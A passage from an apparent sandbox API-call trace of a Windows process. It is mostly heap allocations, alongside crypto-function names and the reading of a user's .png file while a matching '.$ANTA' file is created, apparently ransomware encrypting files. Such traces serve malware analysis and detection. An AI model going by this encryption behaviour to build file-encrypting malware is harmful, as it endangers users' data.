(HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28e0 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae98 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb030 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0095.018] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26f0 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43e9c68 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e48 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0095.019] PeekMessageW (in: lpMsg=0x144eb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eb54) returned 0 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27c0 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac40 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaf0 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab80 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacd0 [0095.019] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad00 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caac0 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cac70 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad60 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab50 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cab08 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabc8 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad78 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43caaa8 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe00 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0095.020] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cacb8 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0095.020] PeekMessageW (in: lpMsg=0x144e65c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e65c) returned 0 [0095.020] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2910 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2730 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf10 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0095.021] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2730 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae38 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0095.021] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0095.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11) returned 0x1796e48 [0095.022] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796e48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0095.022] CryptDestroyHash (hHash=0x41ac740) returned 1 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2910 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43e95f0 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafb8 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27d0 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0095.022] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf28 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27f0 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2850 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27d0 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2790 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2740 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43eafd0 [0095.023] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0095.023] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\X0f8JSrsqtdBsB.png" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\x0f8jsrsqtdbsb.png"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0095.024] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.024] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ec58 | out: lpNewFilePointer=0x0) returned 1 [0095.024] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz")) returned 0x10 [0095.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a500 | out: hHeap=0x1780000) returned 1 [0095.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0095.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0095.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0095.024] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0095.024] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\cLIkSZ\\X0f8JSrsqtdBsB.png.$ANTA" (normalized: "c:\\users\\fd1hvy\\pictures\\cliksz\\x0f8jsrsqtdbsb.png.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0095.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0095.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0095.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0095.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0095.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.025] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.025] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e48 | out: hHeap=0x1780000) returned 1 [0095.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0095.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac000 | out: hHeap=0x1780000) returned 1 [0095.026] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0095.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0095.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.026] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.029] SetFilePointerEx (in: hFile=0x298, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0095.029] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x10000, lpOverlapped=0x0) returned 1 [0095.031] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x8cd8, lpOverlapped=0x0) returned 1 [0095.033] ReadFile (in: hFile=0x298, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0095.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0095.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0095.033] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0d020 | out: hHeap=0x1780000) returned 1 [0095.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0095.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0095.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd38 | out: hHeap=0x1780000) returned 1 [0095.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0095.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0095.036] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.036] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca718 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0095.037] PeekMessageW (in: lpMsg=0x144f084, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f084) returned 0 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.037] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d20 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25e0 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0095.037] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2870 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca850 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa48 | out: hHeap=0x1780000) returned 1 [0095.038] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 [0095.038] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9a0 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca790 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca988 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa30 | out: hHeap=0x1780000) returned 1 [0095.038] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28e0 | out: hHeap=0x1780000) returned 1 [0095.039] PeekMessageW (in: lpMsg=0x144e63c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e63c) returned 0 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca928 | out: hHeap=0x1780000) returned 1 [0095.039] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391ea8 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0095.039] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0095.040] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 